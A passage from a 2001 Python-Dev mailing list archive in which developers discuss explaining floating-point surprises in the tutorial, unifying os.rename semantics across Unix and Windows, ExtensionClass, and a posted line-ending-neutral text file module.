scared them <0.5 wink>. > It seems to me that the RepresentationError document was written for > people with a decent background in maths - There's nothing more complicated than integer division there. > exactly the sort of people who _don't_ need such a document. They actually do: regardless of math background, nothing about f.p. is obvious before studying f.p. as a subject in its own right. It's "not like" anything else, and in previous lives I spent a good chunk of my work time explaining the same stuff to doctorates. Mathematicians were actually the hardest audience at first, perhaps because they had the hardest time admitting they didn't already understand it; after getting beyond bruised professional pride, though, they were the easiest audience to bring up to speed. From tim at digicool.com Tue May 22 06:58:21 2001 From: tim at digicool.com (Tim Peters) Date: Tue, 22 May 2001 00:58:21 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: [Michel Pelletier, on http://www.lahey.com/float.htm] > I liked the tone too, but it really goes into a lot of detail, there's > this problem, and that one, oh and also *this* one and then there's > *that* and the other thing, and after a while you get the impression > that floating-point is for the insane. Using an unfamiliar power tool with sharp edges, and while blindfolded, is insane. [and on http://www.python.org/cgi-bin/moinmoin/RepresentationError] > I agree. Equations should not be needed to explain this. There's exactly one equation on that page, saying that one ratio of two integers is approximately equal to another ratio of two integers. If that's too much for you, and you weren't satisfied with the *initial* hand-wavy explanation ("1/10 is not exactly representable as a binary fraction") either, then it's up to you to do better than the latter without actually saying anything useful : Q: Why is Python broken: >>> 0.1 0.10000000000000001 A: [your turn] From gward at python.net Tue May 22 15:41:57 2001 From: gward at python.net (Greg Ward) Date: Tue, 22 May 2001 09:41:57 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: ; from tim@digicool.com on Mon, May 21, 2001 at 05:57:22PM -0400 References: Message-ID: <20010522094157.A1245@gerg.ca> On 21 May 2001, Tim Peters said: > + Happy to add text explaining the existence of surprises, and > providing a URL. Do the floating-point morons on Python-Dev > find this one comprehensible?: > > http://www.lahey.com/float.htm I found this article more useful, interesting, and informative than whatever I learned about binary floating-point in my academic years. Good link, Tim. Two catches: * I can just barely follow the FORTRAN examples; I very much doubt the average Python newbie would have any more luck than me * I tried several of the FORTRAN examples in Python, and did not witness any of the gotchas they are meant to illustrate. Possibly it's just single-precision vs. double-precision difference, but Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2 doesn't demonstrate the same gotchas as that article does. Greg -- Greg Ward - geek gward at python.net http://starship.python.net/~gward/ Ban the bomb -- save the world for conventional warfare. From skip at pobox.com Tue May 22 18:01:40 2001 From: skip at pobox.com (skip at pobox.com) Date: Tue, 22 May 2001 11:01:40 -0500 Subject: [Python-Dev] type/class unification and ExtensionClass Message-ID: <15114.36196.4677.99240@beluga.mojam.com> I know Guido has recently been working on some of the type/class unification issues (PEPs 252 and 253). Will this affect ExtensionClass? In particular, will it go away or have to be reworked significantly for Python 2.2 or 2.3? The new PyGtk wrappers use the ExtensionClass module. I'm curious about how hard it would be to move away from ExtensionClass for these wrappers. My reading of PEP 253 suggests this shouldn't be too difficult. I'd ask Guido directly, but I figure other people on this list might also have useful input on the issue and/or be able to answer, saving him the time. At any rate, he will see it posted here just the same. Thx, Skip From guido at digicool.com Tue May 22 18:23:52 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 12:23:52 -0400 Subject: [Python-Dev] type/class unification and ExtensionClass In-Reply-To: Your message of "Tue, 22 May 2001 11:01:40 CDT." <15114.36196.4677.99240@beluga.mojam.com> References: <15114.36196.4677.99240@beluga.mojam.com> Message-ID: <200105221623.f4MGNqC02110@odiug.digicool.com> > I know Guido has recently been working on some of the type/class unification > issues (PEPs 252 and 253). And I'm not done yet. :-) > Will this affect ExtensionClass? In particular, > will it go away or have to be reworked significantly for Python 2.2 or 2.3? Probably. Jim Fulton in particular asked me to work on this because he wants to phase out ExtensionClass. > The new PyGtk wrappers use the ExtensionClass module. I'm curious about how > hard it would be to move away from ExtensionClass for these wrappers. My > reading of PEP 253 suggests this shouldn't be too difficult. I don't think so either. > I'd ask Guido directly, but I figure other people on this list might also > have useful input on the issue and/or be able to answer, saving him the > time. At any rate, he will see it posted here just the same. --Guido van Rossum (home page: http://www.python.org/~guido/) From michel at digicool.com Tue May 22 23:44:09 2001 From: michel at digicool.com (Michel Pelletier) Date: Tue, 22 May 2001 14:44:09 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: On Tue, 22 May 2001, Tim Peters wrote: > [Michel Pelletier, on http://www.lahey.com/float.htm] > > I liked the tone too, but it really goes into a lot of detail, there's > > this problem, and that one, oh and also *this* one and then there's > > *that* and the other thing, and after a while you get the impression > > that floating-point is for the insane. > > Using an unfamiliar power tool with sharp edges, and while blindfolded, is > insane. I should have been more clear, I liked the first couple of paragraphs for their descriptions, and there is certainly nothing wrong with the document as it stands, but such an explanation would be a bit too lengthly and boring to a typical fifth grader or photoshop guru going through the Tutorial and dabbling in programming for the very first time. > [and on http://www.python.org/cgi-bin/moinmoin/RepresentationError] > > > I agree. Equations should not be needed to explain this. > > There's exactly one equation on that page, saying that one ratio of two > integers is approximately equal to another ratio of two integers. Who was it that said every equation will halve your audience? I agree with that, the tutorial should try to be as broad and simple as possible. > If that's > too much for you, and you weren't satisfied with the *initial* hand-wavy > explanation ("1/10 is not exactly representable as a binary fraction") > either, then it's up to you to do better than the latter without actually > saying anything useful : The latter is fine, although I think the first document hand-waves better. -Michel From skip at pobox.com Tue May 22 23:54:42 2001 From: skip at pobox.com (skip at pobox.com) Date: Tue, 22 May 2001 16:54:42 -0500 Subject: [Python-Dev] unifying os.rename semantics across platform Message-ID: <15114.57378.887742.531145@beluga.mojam.com> Couldn't figure out why this message never generated any comment. Turns out it didn't reach the list because the host I sent it from (dynamic4.tttech.com) couldn't be resolved. I just noticed it in my errors mailbox and am sending it out again. ------------------------------------------------------------------------------ It was brought to my attention a week ago by a client that os.rename semantics differ between Unix and Windows. On Unix, if the destination file already exists it is silently deleted. On Windows, an exception is raised. I was able to verify this for Python 2.0 on Windows98. I assume nothing changed for 2.1, but I can't verify that. (Windows trashed my partition table and my Linux root partition while I was downloading 2.1. Consequently, I no longer run Windows. Take that, Bill...) I haven't checked the Mac yet (will do that when I get back to the US), but I think that os.rename should have the same semantics across all platforms. To the extent reasonably possible, I think this should also be true of other common functions exposed through the os module. On the (unsupportable) theory that to-date, more Python apps have been written and/or deployed on Unix-like systems and that where Windows apps are concerned, many developers will have added a thin wrapper to mimic the Unix semantics, I think less breakage would result if the Unix semantics were implemented in the Windows version. It appears that is what POSIX compliance would demand as well. Skip From fdrake at acm.org Tue May 22 23:55:29 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Tue, 22 May 2001 17:55:29 -0400 (EDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: References: Message-ID: <15114.57425.540688.205255@cj42289-a.reston1.va.home.com> Michel Pelletier writes: > as it stands, but such an explanation would be a bit too lengthly and > boring to a typical fifth grader or photoshop guru going through the > Tutorial and dabbling in programming for the very first time. But that's not the audience the Python Tutorial is targetted to -- readers are expected to be essentially competant in at least one "3rd generation" language. Maybe a few will shy away from a simple equation, but not so many. Those who do would do well to shy away from FP as well. ;-) -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake at acm.org Wed May 23 00:04:11 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Tue, 22 May 2001 18:04:11 -0400 (EDT) Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <15114.57378.887742.531145@beluga.mojam.com> References: <15114.57378.887742.531145@beluga.mojam.com> Message-ID: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> skip at pobox.com writes: > On the (unsupportable) theory that to-date, more Python apps have been > written and/or deployed on Unix-like systems and that where Windows apps are > concerned, many developers will have added a thin wrapper to mimic the Unix > semantics, I think less breakage would result if the Unix semantics were I don't know whether there are more deployed Python apps on Unix than on Windows (and I've no good idea about how to find out), but I think unifying the semantics one way or the other is a good thing. Regardless of which set of semantics is chosen. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From mwh at python.net Wed May 23 00:07:12 2001 From: mwh at python.net (Michael Hudson) Date: 22 May 2001 23:07:12 +0100 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Michel Pelletier's message of "Tue, 22 May 2001 14:44:09 -0700 (PDT)" References: Message-ID: Michel Pelletier writes: > Who was it that said every equation will halve your audience? It was Stephen Hawking's editor when he was preparing A Brief History Of Time (or at least, it gets mentioned in the preface; the advice may be older). Cheers, M. -- 7. It is easier to write an incorrect program than understand a correct one. -- Alan Perlis, http://www.cs.yale.edu/homes/perlis-alan/quotes.html From jeremy at digicool.com Wed May 23 00:57:40 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Tue, 22 May 2001 18:57:40 -0400 (EDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: References: Message-ID: <15114.61156.692322.674137@slothrop.digicool.com> >>>>> "MWH" == Michael Hudson writes: MWH> Michel Pelletier writes: >> Who was it that said every equation will halve your audience? MWH> It was Stephen Hawking's editor when he was preparing A Brief MWH> History Of Time (or at least, it gets mentioned in the preface; MWH> the advice may be older). There's a similar saw about excerpts of books in foreign languages. I believe I first read it in reference to Umberto Eco's Foucault's Pendulum, which starts with a full page of Hebrew. Jeremy From chrishbarker at home.net Wed May 23 01:21:01 2001 From: chrishbarker at home.net (Chris Barker) Date: Tue, 22 May 2001 16:21:01 -0700 Subject: [Pythonmac-SIG] Re: [Python-Dev] Import hook to do end-of-line conversion? References: <20010414192445-r01010600-f8273ce6@213.84.27.177> Message-ID: <3B0AF45D.732126E6@home.net> Just van Rossum wrote: > Agreed. I'll try to write one, once I'm feeling better: having the flu doesn't > seem to help focussing on actual content... > > Just Just (or anyone else) Have you made any progress on this PEP? I'd like to see it happen, so if you havn't done it, I'll try to find the time to make a start on it myself. I have written a simple class that impliments a line-ending-neutral text file class. I wrote it because I have a need for it, and I thought it would be a reasonable prototype for any syntax and methods we might want to use in an actual implimentation. I doubt anyone would find the methods I used particularly clean or elegant (or fast) but it's the first thing I've come up with, and it seems to work. I've enclosed the module with this email. If that doesn't work, let me know and I'll put it on a website. -Chris -- Christopher Barker, Ph.D. ChrisHBarker at home.net --- --- --- http://members.home.net/barkerlohmann ---@@ -----@@ -----@@ ------@@@ ------@@@ ------@@@ Oil Spill Modeling ------ @ ------ @ ------ @ Water Resources Engineering ------- --------- -------- Coastal and Fluvial Hydrodynamics -------------------------------------- ------------------------------------------------------------------------ -------------- next part -------------- #!/usr/bin/env python """ TextFile.py : a module that provides a UniversalTextFile class, and a replacement for the native python "open" command that provides an interface to that class. It would usually be used as: from TextFile import open then you can use the new open just like the old one (with some added flags and arguments) or import TextFile file = TextFile.open(filename,flags,[bufsize], [LineEndingType], [LineBufferSize]) """ import os ## Re-map the open function _OrigOpen = open def open(filename,flags = "",bufsize = -1, LineEndingType = "", LineBufferSize = ""): """ A new open function, that returns a regular python file object for the old calls, and returns a new nifty universal text file when required. This works just like the regular open command, except that a new flag and a new parameter has been added. Call: file = open(filename,flags = "",bufsize = -1, LineEndingType = ""): - filename is the name of the file to be opened - flags is a string of one letter flags, the same as the standard open command, plus a "t" for universal text file. - - "b" means binary file, this returns the standard binary file object - - "t" means universal text file - - "r" for read only - - "w" for write. If there is both "w" and "t" than the user can specify a line ending type to be used with the LineEndingType parameter. - - "a" means append to existing file - bufsize specifies the buffer size to be used by the system. Same as the regular open function - LineEndingType is used only for writing (and appending) files, to specify a non-native line ending to be written. - - The options are: "native", "DOS", "Posix", "Unix", "Mac", or the characters themselves( "\r\n", etc. ). "native" will result in using the standard file object, which uses whatever is native for the system that python is running on. - LineBufferSize is the size of the buffer used to read data in a readline() operation. The default is currently set to 200 characters. If you will be reading files with many lines over 200 characters long, you should set this number to the largest expected line length. """ if "t" in flags: # this is a universal text file if ("w" in flags or "a" in flags) and LineEndingType == "native": return _OrigOpen(filename,flags.replace("t",""), bufsize) return UniversalTextFile(filename,flags,LineEndingType,LineBufferSize) else: # this is a regular old file return _OrigOpen(filename,flags,bufsize) class UniversalTextFile: """ A class that acts just like a python file object, but has a mode that allows the reading of arbitrary formated text files, i.e. with either Unix, DOS or Mac line endings. [\n , \r\n, or \r] To keep it truly universal, it checks for each of these line ending possibilities at every line, so it should work on a file with mixed endings as well. """ def __init__(self,filename,flags = "",LineEndingType = "native",LineBufferSize = ""): self._file = _OrigOpen(filename,flags.replace("t","")+"b") LineEndingType = LineEndingType.lower() if LineEndingType == "native": self.LineSep = os.linesep() elif LineEndingType == "dos": self.LineSep = "\r\n" elif LineEndingType == "posix" or LineEndingType == "unix" : self.LineSep = "\n" elif LineEndingType == "mac": self.LineSep = "\r" else: self.LineSep = LineEndingType ## some attributes self.closed = 0 self.mode = flags self.softspace = 0 if LineBufferSize: self._BufferSize = LineBufferSize else: self._BufferSize = 100 def readline(self): start_pos = self._file.tell() ##print "Current file posistion is:", start_pos line = "" TotalBytes = 0 Buffer = self._file.read(self._BufferSize) while Buffer: ##print "Buffer = ",repr(Buffer) newline_pos = Buffer.find("\n") return_pos = Buffer.find("\r") if return_pos == newline_pos-1 and return_pos >= 0: # we have a DOS line line = Buffer[:return_pos]+ "\n" TotalBytes = newline_pos+1 break elif ((return_pos < newline_pos) or newline_pos < 0 ) and return_pos >=0: # we have a Mac line line = Buffer[:return_pos]+ "\n" TotalBytes = return_pos+1 break elif newline_pos >= 0: # we have a Posix line line = Buffer[:newline_pos]+ "\n" TotalBytes = newline_pos+1 break else: # we need a larger buffer NewBuffer = self._file.read(self._BufferSize) if NewBuffer: Buffer = Buffer + NewBuffer else: # we are at the end of the file, without a line ending. self._file.seek(start_pos + len(Buffer)) return Buffer self._file.seek(start_pos + TotalBytes) return line def readlines(self,sizehint = None): """ readlines acts like the regular readlines, except that it understands any of the standard text file line endings ("\r\n", "\n", "\r"). If sizehint is used, it will read a a mximum of that many bytes. It will not round up, as the regular readline does. This means that if your buffer size is less thatn the length of the next line, you won't get anything. """ if sizehint: Data = self._file.read(sizehint) else: Data = self._file.read() if len(Data) == sizehint: #print "The buffer is full" FullBuffer = 1 else: FullBuffer = 0 Data = Data.replace("\r\n","\n").replace("\r","\n") Lines = [line + "\n" for line in Data.split('\n')] #print Lines ## If the last line is only a linefeed it is an extra line if Lines[-1] == "\n": del Lines[-1] ## if it isn't then the last line didn't have a linefeed, so we need to remove the one we put on. else: ## or it's the end of the buffer if FullBuffer: #print "the file is at:",self._file.tell() #print "the last line has length:",len(Lines[-1]) self._file.seek(-(len(Lines[-1])-1),1) # reset the file position del(Lines[-1]) else: Lines[-1] = Lines[-1][:-1] return Lines def readnumlines(self,NumLines = 1): """ readnumlines is an extension to the standard file object. It returns a list containing the number of lines that are requested. I have found this to be very usefull, and allows me to avoid the many loops like: lines = [] for i in range(N): lines.append(file.readline()) Also, If I ever get around to writing this in C, it will provide a speed improvement. """ Lines = [] while len(Lines) < NumLines: Lines.append(self.readline()) return Lines def read(self,size = None): """ read acts like the regular read, except that it tranlates any of the standard text file line endings ("\r\n", "\n", "\r") into a "\n" If size is used, it will read a maximum of that many bytes, before translation. This means that if the line endings have more than one character, the size returned will be smaller. This could gbe patched, but it didn't seem worth it. If you want that much control, use a binary file. """ if size: Data = self._file.read(size) else: Data = self._file.read() return Data.replace("\r\n","\n").replace("\r","\n") def write(self,string): """ write is just like the regular one, except that it uses the line separator specified when the file was opened for writing or appending. """ self._file.write(string.replace("\n",self.LineSep)) def writelines(self,list): for line in list: self.write(line) # The rest of the standard file methods mapped def close(self): self._file.close() self.closed = 1 def flush(self): self._file.flush() def fileno(self): return self._file.fileno() def seek(self,offset,whence = 0): self._file.seek(offset,whence) def tell(self): return self._file.tell() From guido at digicool.com Wed May 23 01:46:53 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 19:46:53 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: Your message of "Tue, 22 May 2001 16:54:42 CDT." <15114.57378.887742.531145@beluga.mojam.com> References: <15114.57378.887742.531145@beluga.mojam.com> Message-ID: <200105222346.f4MNkr104833@odiug.digicool.com> > It was brought to my attention a week ago by a client that os.rename > semantics differ between Unix and Windows. On Unix, if the destination file > already exists it is silently deleted. On Windows, an exception is raised. > I was able to verify this for Python 2.0 on Windows98. I assume nothing > changed for 2.1, but I can't verify that. I've always known this, and assumed it was common knowledge. Sorry. ;-) > (Windows trashed my partition > table and my Linux root partition while I was downloading 2.1. > Consequently, I no longer run Windows. Take that, Bill...) I haven't > checked the Mac yet (will do that when I get back to the US), but I think > that os.rename should have the same semantics across all platforms. To the > extent reasonably possible, I think this should also be true of other common > functions exposed through the os module. > > On the (unsupportable) theory that to-date, more Python apps have been > written and/or deployed on Unix-like systems and that where Windows apps are > concerned, many developers will have added a thin wrapper to mimic the Unix > semantics, I think less breakage would result if the Unix semantics were > implemented in the Windows version. It appears that is what POSIX > compliance would demand as well. > > Skip I certainly wouldn't want to try to emulate the Windows semantics on Unix. However, I think that emulating the correct Posix semantics on Windows is not possible either. The Posix rename() call guarantees that it is atomic: there is no point in time where the file doesn't exist at all (and a system or program crash can't delete the file). I wouldn't know how to do that in Windows -- the straightforward version if os.path.exists(target): os.unlink(target) os.rename(source, target) leaves a vulnerability open where the target doesn't exist and if at that point the system crashes or the program is killed, you lose the target. I would prefer to document the difference so applications can decide how to deal with this. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 23 01:50:29 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 19:50:29 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Tue, 22 May 2001 14:44:09 PDT." References: Message-ID: <200105222350.f4MNoUj04853@odiug.digicool.com> > Who was it that said every equation will halve your audience? Einstein. > I agree with that, the tutorial should try to be as broad and simple > as possible. But keep in mind that the particular Python tutorial we're talking about is intended for an audience of folks who already know how to program. I vote against dumbing this down. --Guido van Rossum (home page: http://www.python.org/~guido/) From michel at digicool.com Wed May 23 02:17:59 2001 From: michel at digicool.com (Michel Pelletier) Date: Tue, 22 May 2001 17:17:59 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105222350.f4MNoUj04853@odiug.digicool.com> Message-ID: On Tue, 22 May 2001, Guido van Rossum wrote: > > I agree with that, the tutorial should try to be as broad and simple > > as possible. > > But keep in mind that the particular Python tutorial we're talking > about is intended for an audience of folks who already know how to > program. I vote against dumbing this down. Now that I've actually read the tutorial (wink) I see the true target audience. For some reason, I thought it was oriented more toward the CP4E audience. Is there a python "children's book" complete with big red dogs and rabbits in waistcoats? That would be an interesting project... -Michel From guido at digicool.com Wed May 23 02:20:25 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 20:20:25 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Tue, 22 May 2001 17:17:59 PDT." References: Message-ID: <200105230020.f4N0KPU05103@odiug.digicool.com> > Is there a python "children's book" complete with big red dogs and rabbits > in waistcoats? That would be an interesting project... See http://www.python.org/sigs/edu-sig/ and http://www.python.org/doc/Intros.html (the latter has a section with intros for non-programmers). --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Wed May 23 02:23:42 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 22 May 2001 20:23:42 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: I struggled with a way to do a better job of explaining this stuff last night. As I see others already said, the Tutorial is not aimed at script kiddies, or non-programmers, or even programming newbies, but at programmers who are simply new to Python. So everything I put in the tutorial was either jarringly out of place, or inadequate to address the audience you (Michel) have in mind. But I agree that's an important audience, and I spend a fair chunk of my life now anyway eexplaining this stuff over & over to those who think computing a ratio of two integers is akin to solving fourth order differential equations . In the end I decided to write a Tutorial Appendix in a much gentler style. It doesn't really fit with the rest of the Tutorial, but then that's *why* it's an Appendix. The patch is here: http://sourceforge.net/tracker/index.php?func=detail& aid=426208&group_id=5470&atid=305470 I also changed the tutorial fp examples so they have an excellent chance of displaying the same strings across all platforms, and even if Python 10K defaults to decimal floating-point someday (perhaps in the year 10000, as its name suggests). From gward at python.net Wed May 23 02:33:11 2001 From: gward at python.net (Greg Ward) Date: Tue, 22 May 2001 20:33:11 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com>; from guido@digicool.com on Tue, May 22, 2001 at 07:46:53PM -0400 References: <15114.57378.887742.531145@beluga.mojam.com> <200105222346.f4MNkr104833@odiug.digicool.com> Message-ID: <20010522203311.E1245@gerg.ca> On 22 May 2001, Guido van Rossum said: > I would prefer to document the difference so applications can decide > how to deal with this. I agree -- it has always seemed to me that the standard library merely exposes the underlying OS functionality for you. This puts portability somewhat in the hands of the application writer -- with power comes responsibility. I think that's the way it should be; any attempt to convert OS A to the semantics of OS B will fall down somewhere. Witness the loss-of-atomicity in Guido's example. I'm sure any other semantic difference between OSes would have similar "gotchas" if we attempted to paper over them. Greg -- Greg Ward - just another Python hacker gward at python.net http://starship.python.net/~gward/ Beware of altruism. It is based on self-deception, the root of all evil. From tim.one at home.com Wed May 23 08:31:29 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 02:31:29 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <20010522094157.A1245@gerg.ca> Message-ID: [Greg Ward, on http://www.lahey.com/float.htm] > I found this article more useful, interesting, and informative than > whatever I learned about binary floating-point in my academic years. > Good link, Tim. Two catches: > > * I can just barely follow the FORTRAN examples; I very much doubt > the average Python newbie would have any more luck than me The goal is to frighten them: the ones with the right stuff to use fp without destroying a satellite, bringing down the Internet, designing a pacemaker that fails when rounding a corner clockwise at 1.37g, causing a small country's economy to collapse, making jet fighters spontaneously turn upside down when crossing the equator, or triggering WW III by accident, will persist . BTW, not all of those were made up! > * I tried several of the FORTRAN examples in Python, and did not > witness any of the gotchas they are meant to illustrate. Possibly > it's just single-precision vs. double-precision difference, but > Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2 > doesn't demonstrate the same gotchas as that article does. You can't illustrate the last half of their examples in Python without playing obscure games with the struct module, because they rely on the existence of more than one size of floating-point type. Your lack of luck with the first half of their examples is indeed solely due to that he used single-precision examples and Python's float is double. You need to find different numbers to show the same things in Python; like so: # Binary Floating Point x = 100000000000. * 0.00000000001 if x != 1.0: print "Oops! It's %r" % x # Inexactness a = 98. / 49. reciprocal = 1./49. b = 98. * reciprocal if a != b: print "Oops! They're %r and %r" % (a, b) # Crazy Conversions x = 32.05 y = x * 100. # "looks like" 3205. if display rounded i = int(y) # actually truncates to 3204 print y, i, repr(y) It's Real Work coming up with stuff like that. What I'm hearing is that people won't understand it anyway -- so screw it. If they want an education, they can prove it by doing a google search <0.6 wink>. From tim.one at home.com Wed May 23 08:44:14 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 02:44:14 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com> Message-ID: [Guido] > ... > I certainly wouldn't want to try to emulate the Windows semantics on > Unix. However, I think that emulating the correct Posix semantics on > Windows is not possible either. Neither is it desirable: Windows isn't POSIX, and Windows users would be appalled if os.rename() could silently destroy files. If such a function needs to exist, create a new cowboy_unix_tricks module instead . This has never been a problem for me because I always check to see whether the target file exists before using os.rename(), and do something else if it does. I understand that's vulnerable to races, but nobody asked whether I cared about that . > The Posix rename() call guarantees that it is atomic: there is no > point in time where the file doesn't exist at all (and a system or > program crash can't delete the file). I wouldn't know how to do > that in Windows -- the straightforward version > > if os.path.exists(target): > os.unlink(target) > os.rename(source, target) > > leaves a vulnerability open where the target doesn't exist and if at > that point the system crashes or the program is killed, you lose the > target. More obvious, it also fails if target simply exists and is open (you can't unlink an open file on Windows). Nevertheless, you can do this renaming safely on Windows, via doing the right system magic to make rename happen at reboot time before Windows actually starts. But I'm not sure Skip's client would want to reboot each time Python did a file rename . > I would prefer to document the difference so applications can decide > how to deal with this. Yup! From MarkH at ActiveState.com Wed May 23 10:55:17 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Wed, 23 May 2001 18:55:17 +1000 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: [Tim on a subject near and dear to his testicles] > It's Real Work coming up with stuff like that. What I'm hearing is that > people won't understand it anyway -- so screw it. If they want > an education, > they can prove it by doing a google search <0.6 wink>. I am inclined to agree. IMO, The Python tutorial or other documentation should include a basic example of these "errors", and a link to _either_ of the HTML pages referenced in this thread as an optional extra. Just enough to stop _most_ of the "this is a bug" posts - but stopping well short of any attempt to "educate" them in floating point madness. Just _one_ example of floats not being exact would suffice. Going from my personal experience, I learnt long ago that floating point is not exact. That is all I needed to know to move on. I didn't like it, and I didn't understand exactly why (I thought I did, but Tim put a stop to that misconception ), but I could move on once I had that skerrick of enlightenment. And believe it or not, some of my code _does_ use floats, and _does_ work! (well, works as well as the rest of my code anyway ) And-it-wasn't-even-Python-that-taught-me, Mark. From pf at artcom-gmbh.de Wed May 23 09:49:13 2001 From: pf at artcom-gmbh.de (Peter Funk) Date: Wed, 23 May 2001 09:49:13 +0200 (MEST) Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> from "Fred L. Drake, Jr." at "May 22, 2001 06:04:11 pm" Message-ID: Hi, Fred L. Drake, Jr. schrieb: > skip at pobox.com writes: > > On the (unsupportable) theory that to-date, more Python apps have been > > written and/or deployed on Unix-like systems and that where Windows apps are > > concerned, many developers will have added a thin wrapper to mimic the Unix > > semantics, I think less breakage would result if the Unix semantics were > > I don't know whether there are more deployed Python apps on Unix > than on Windows (and I've no good idea about how to find out), but I > think unifying the semantics one way or the other is a good thing. > Regardless of which set of semantics is chosen. I agree. May I suggest to add an optional third boolean parameter to os.rename called 'replace', which defaults either to TRUE or FALSE, so modifying existing apps will become even less hassle to potential porters. Here is a strawman to explain what I mean: -------------------------------------- import os def new_rename(src, dst, replace=0, old_rename=os.rename): if os.path.exists(dst): if replace: if not os.path.isdir(dst): os.remove(dst) else: # I'm not sure what to do here. recursive removal? dangerous! raise NotImplementedError else: raise OSError("%s already exists" % dst) return old_rename(src, dst) os.rename = new_rename -------------------------------------- Regards, Peter -- Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260 office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany) From jack at oratrix.nl Wed May 23 13:15:10 2001 From: jack at oratrix.nl (Jack Jansen) Date: Wed, 23 May 2001 13:15:10 +0200 Subject: [Python-Dev] Assertion failed in dictobject.c Message-ID: <20010523111510.D504D3B8999@snelboot.oratrix.nl> I'm seeing the assert on line 525 in dictobject.c (revision 2.92) failing. The debugger tells me that ma_fill and ma_size are both 8. ma_used is 2, and interestingly hash is also 8. Going back to revision 2.90 fixes the problem (or masks it). -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From skip at pobox.com Wed May 23 13:59:45 2001 From: skip at pobox.com (skip at pobox.com) Date: Wed, 23 May 2001 06:59:45 -0500 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: References: <200105222346.f4MNkr104833@odiug.digicool.com> Message-ID: <15115.42545.172775.716565@beluga.mojam.com> >>>>> "Tim" == Tim Peters writes: Tim> [Guido] >> I would prefer to document the difference so applications can decide >> how to deal with this. Tim> Yup! Submitted as patch #426598, assigned to Dr. Doc (aka Fred). Skip From skip at pobox.com Wed May 23 14:11:51 2001 From: skip at pobox.com (skip at pobox.com) Date: Wed, 23 May 2001 07:11:51 -0500 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: References: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> Message-ID: <15115.43271.480135.227059@beluga.mojam.com> Peter> I agree. May I suggest to add an optional third boolean Peter> parameter to os.rename called 'replace', which defaults either to Peter> TRUE or FALSE, so modifying existing apps will become even less Peter> hassle to potential porters. In his response to my post, Guido indicated there is a race condition. Between the time you delete the preexisting destination file and do the actual file rename, Windows could wink out on you, leaving you with the original src file and no original dst file. POSIX semantics require the rename to be atomic. This is just not going to be possible. Fred, perhaps my doc mod should be enhanced to identify the race condition for people who need to use os.rename on Windows and will be forced to first unlink the destination file. Skip From guido at digicool.com Wed May 23 15:19:24 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 09:19:24 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Wed, 23 May 2001 02:31:29 EDT." References: Message-ID: <200105231319.f4NDJOs06485@odiug.digicool.com> I liked the text that Tim posted to SF, but I would like it even better if it also *contained* the text from the "PresentationError" moinmoin wiki page, rather than referring to it by URL. The moinmoin URL is not a good long-term name for that information -- printed copies of the tutorial will persist long after the moinmoin wiki has been moved or consolidated. Plus, instead of referring people to the moinmoin wiki page, I'd like to be able to refer them to the appendix of the tutorial! --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 23 15:32:17 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 09:32:17 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Wed, 23 May 2001 18:55:17 +1000." References: Message-ID: <200105231332.f4NDWH706564@odiug.digicool.com> [Mark] > IMO, The Python tutorial or other documentation should include a basic > example of these "errors", and a link to _either_ of the HTML pages > referenced in this thread as an optional extra. > > Just enough to stop _most_ of the "this is a bug" posts - but > stopping well short of any attempt to "educate" them in floating > point madness. Just _one_ example of floats not being exact would > suffice. I agree: we don't have to explain *why* it happens. We just have to explain *that* it happens, so 